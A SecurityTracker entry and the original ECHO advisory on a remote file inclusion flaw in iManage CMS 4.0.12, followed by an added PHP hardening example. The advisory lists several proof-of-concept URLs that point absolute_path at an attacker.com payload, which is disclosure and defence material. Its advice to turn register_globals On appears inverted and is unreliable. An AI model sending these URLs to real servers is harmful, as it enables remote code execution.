SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   iManage CMS
Vendors:   imaginex resource
iManage CMS Include File Bug Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016551
SecurityTracker URL:  http://securitytracker.com/id/1016551
CVE Reference:   CVE-2006-3771
Updated:  Jun 13 2008
Original Entry Date:  Jul 21 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.0.12 and prior versions
Description:   A vulnerability was reported in iManage CMS. A remote user can include and execute arbitrary code on the target system.

The 'insert.php' script does not properly validate user-supplied input in the 'absolute_path' parameter. If register_globals is disabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

Several other scripts are also affected.

Some demonstration exploit URLs are provided:

http://[target]/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?

http://[target]/[path]/news.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/registration.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/whosOnline.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/components/com_calendar.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/components/com_forum.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/components/minibb/index.php?absolute_path=http://[attacker]//inject.txt?

http://[target]/[path]/modules/mod_calendar.php?absolute_path=http://[attacker]//inject.txt?

The original advisory is available at:

http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt

Ahmad Maulana a.k.a Matdhule reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.imaginex-resource.com/imxrustice/index.php?option=articles&task=viewarticle&artid=8
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File

ECHO.OR.ID

ECHO_ADV_40$2006

---------------------------------------------------------------------------------------------------

[ECHO_ADV_40$2006] iManage CMS <= 4.0.12 (absolute_path) Remote File Inclusion

---------------------------------------------------------------------------------------------------


Author          : Ahmad Maulana a.k.a Matdhule

Date Found      : July, 20th 2006

Location        : Indonesia, Jakarta

web             : http://advisories.echo.or.id/adv/adv40-matdhule-2006.txt

Critical Lvl    : Highly critical

Impact          : System access

Where           : From Remote

---------------------------------------------------------------------------


Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iManage CMS from Imaginex-Resource


Application     : iManage CMS

version         : 4.0.12 stable

URL             : http://www.imaginex-resource.com


---------------------------------------------------------------------------


Vulnerability:

~~~~~~~~~~~~~~~~


-----------------------component.php----------------------
....
<?php
/**
*    iManage Version 4.0.12
*    Dynamic portal server and Content managment engine
*    03-02-2003
*
*    Copyright (C) 2000 - 2003 Imaginex-Resource
*
*    Site Name: iManage Version 4.0.12
*    File Name: rightComponent.php
*    Date: 31/01/2003
*     Version #: 4.0.12
*    Comments: Display all modules which are to be displayed on the right.
**/

include($absolute_path.'/language/'.$lang.'/lang_components.php');
...
----------------------------------------------------------


Input passed to the "absolute_path" parameter in insert.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources.


Affected files: 


articles.php

contact.php

displaypage.php

faq.php

mainbody.php

news.php

registration.php

whosOnline.php

components/com_calendar.php

components/com_forum.php

components/minibb/index.php

components/minibb/bb_admin.php

components/minibb/bb_plugins.php

modules/mod_calendar.php

modules/mod_browser_prefs.php

modules/mod_counter.php

modules/mod_online.php

modules/mod_stats.php

modules/mod_weather.php

themes/bizz.php

themes/default.php

themes/simple.php

themes/original.php

themes/portal.php

themes/purple.php


and more :)


Successful exploitation requires that "register_globals= Off ".


Proof Of Concept:

~~~~~~~~~~~~~~~~~


http://target.com/[path]/articles.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/contact.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/displaypage.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/faq.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/mainbody.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/news.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/registration.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/whosOnline.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/components/com_calendar.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/components/com_forum.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/components/minibb/index.php?absolute_path=http://attacker.com//inject.txt?

http://target.com/[path]/modules/mod_calendar.php?absolute_path=http://attacker.com//inject.txt?


and more Affected files



Solution:

~~~~~~~~~

- Change register_globals= On in php.ini

- Sanitize variable $absolute_path on affected files.


---------------------------------------------------------------------------

Shoutz:

~~~~~

~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson  :) 

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous

~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama

~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com

~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------

Contact:

~~~~~~

 

     matdhule[at]gmail[dot]com

     

-------------------------------- [ EOF ]----------------------------------
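
Added example (not part of the advisory and not iManage code): one way to remove the request-influenced prefix from the include quoted above, by fixing the install root server-side and constraining the language component. IMANAGE_ROOT, ALLOWED_LANGS and language_file() are hypothetical names, the language list is constructed, and PHP 7.1 or later is assumed.

```php
<?php
// Added example, not iManage code. IMANAGE_ROOT, ALLOWED_LANGS and
// language_file() are hypothetical names; the language list is constructed.
// Defence in depth in php.ini: allow_url_include = Off

// Pattern quoted in the advisory: the path prefix is a bare variable
// that the included script itself never assigns.
//   include($absolute_path.'/language/'.$lang.'/lang_components.php');

// Hardened form: the install root comes from this file's own location.
define('IMANAGE_ROOT', __DIR__);
const ALLOWED_LANGS = ['english', 'indonesian'];

/** Return the real path of a language file, or null if it is not allowed. */
function language_file(string $lang, string $file): ?string
{
    // Exact-match allow-list, so no "../" or URL can ride in through $lang.
    if (!in_array($lang, ALLOWED_LANGS, true)) {
        return null;
    }
    $base = realpath(IMANAGE_ROOT . '/language');
    if ($base === false) {
        return null;
    }
    // basename() drops directory parts; realpath() returns false when the
    // file does not exist.
    $path = realpath($base . '/' . $lang . '/' . basename($file));
    if ($path === false) {
        return null;
    }
    // The resolved file must still sit under the language directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Assumption: $lang is set earlier by the application's own configuration.
$lang = isset($lang) ? (string) $lang : 'english';
$target = language_file($lang, 'lang_components.php');
if ($target === null) {
    http_response_code(500);
    exit('language file unavailable');
}
include $target;
```

The same change applies to each file in the affected list, since every one of them builds its include path from the same variable.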

 

 
 



Copyright 2021, SecurityGlobal.net LLC